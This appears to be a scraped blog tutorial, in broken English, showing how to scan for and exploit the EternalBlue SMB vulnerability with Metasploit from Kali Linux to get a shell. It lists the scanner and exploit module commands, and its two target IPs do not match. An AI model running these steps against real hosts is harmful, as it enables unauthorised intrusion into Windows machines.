zoukankan      html  css  js  c++  java
  • Kali Linux下利用永恒之蓝漏洞发起攻击获取Shell

    Material:

            Computer 

            VMware 12

            Kali Linux.ISO

            Internet

    First:

        Open Your Computer and VMware:

    VMware Of KaliSecond Open Your SSH Connection Tools, Eg Securt CRT,Putty.......

    Input Msfconsole On Your Tools,

    Let's Wait For Him To Be Successful...............

    Ok,Screen Picture :

    Msfconsole


    Then We Input use auxiliary/scanner/smb/smb_ms17_010

                             Show options

    Set The Target Host IP Or IP Segment That You Need To Attack , Scan Them Leak ,And Know What Work Load Is Needed

                   My Attack Host Is 192.168.10.100 . This Is a Computer_Phone  Server

    Input : set rhosts 192.168.10.10    (  Attacted IP  )            

               Exploit


    Attack


    If The Interface Is Like This ,  It Means There Is A Vulnerability,

    So ,Let's Attack This Host.

    Input : use exploit/windows/smb/ms17_010_eternalblue

               show options

                set rhost 192.168.10.100

               Exploit    

     



    Successful Attack Host And Get Shell !!!!!!!!!

                

                

                                                                                                                                英文水平有限,兄弟们就将就讲究吧

  • 相关阅读:
    开通了
    A computer hardware platform abstraction
    脑机接口入门概览
    JDK自带VM分析工具jps,jstat,jmap,jconsole
    泛型里的super和extend
    动态规划
    用二分法查找的套路(一)
    A computer hardware platform abstraction
    CentOS7安装JDK1.8
    CentOS7如何修改hostname
  • 原文地址:https://www.cnblogs.com/chk141/p/12220324.html
Copyright © 2011-2022 走看看